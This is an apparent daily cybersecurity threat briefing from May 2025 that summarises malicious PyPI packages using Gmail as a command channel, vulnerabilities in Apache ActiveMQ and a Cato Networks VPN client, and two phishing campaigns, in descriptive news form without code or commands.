Cyware Daily Threat Intelligence, May 01, 2025

Daily Threat Briefing • May 1, 2025
Daily Threat Briefing • May 1, 2025
Some PyPI packages are doing more than importing functions. Researchers uncovered seven malicious Python packages under the “Coffin” naming scheme, using Gmail’s SMTP service as a stealthy C2 channel. Hardcoded credentials let the malware establish outbound tunnels via port 465, send activation signals, and quietly exfiltrate data.
Apache ActiveMQ users should be on high alert. A flaw in its .NET Message Service library now lets remote attackers inject code by abusing deserialization. All versions prior to the latest update are at risk, so prompt patching is essential to protect your systems.
Emails that look like official Social Security alerts are turning into dangerous gateways. In the new Molatori phishing campaign, attackers send messages claiming your Social Security Statement is ready to download. Once you install the ScreenConnect client they push, remote access is granted, and sensitive data gets swept away, thanks to convincing links from compromised WordPress sites.
Hive0117 drops new DarkWatchman malware version
The Hive0117 group is conducting a phishing campaign targeting Russian firms across various sectors using a modified version of the DarkWatchman malware. This campaign involved mass emails with the subject "Documents from 04/29/2025," which contained password-protected archives. Once opened, these archives triggered an infection chain, installing DarkWatchman, capable of evading standard antivirus detection.
Malicious Python packages use Gmail as C2
Seven malicious Python packages uploaded to PyPI have been discovered using Gmail's SMTP service as a covert C2 channel. These packages, under the "Coffin" naming convention, enable attackers to exfiltrate data, execute commands, and establish persistent tunnels that bypass traditional security controls. These packages used hardcoded Gmail credentials to establish outbound tunnels and send activation signals to attacker-controlled email addresses. The malware initiates outbound SMTP connections to Gmail using port 465, making detection difficult.
Vulnerability in Apache ActiveMQ
A critical vulnerability in Apache ActiveMQ’s .NET Message Service library, identified as CVE-2025-29953, allows remote attackers to execute arbitrary code on unpatched systems. This flaw, with a CVSS score of 8.1, is due to improper validation of user-supplied data during deserialization, permitting malicious payload injections. The vulnerability affects all versions of ActiveMQ prior to the latest update, which was released on April 30.
Critical flaw in Cato Networks macOS VPN client
A critical vulnerability in Cato Networks' macOS VPN client has been disclosed, allowing attackers with limited access to execute arbitrary code with root privileges. This vulnerability, tracked as ZDI-25-252, stems from a race condition in the client's installation process, affecting all versions prior to April 2025. Cato Networks has not yet released an official fix.
New phishing campaign installs ScreenConnect
The new Molatori phishing campaign has been targeting users with emails that appear to come from the U.S. Social Security Administration, claiming that their Social Security Statement is ready for download. The emails contain attachments disguised as legitimate files, such as "ReceiptApril2025Pdfc.exe." Once victims download and install the ScreenConnect client, cybercriminals gain remote access to their computers, enabling them to exfiltrate sensitive data, including banking information and personal identification numbers. The campaign leverages compromised WordPress sites to appear credible.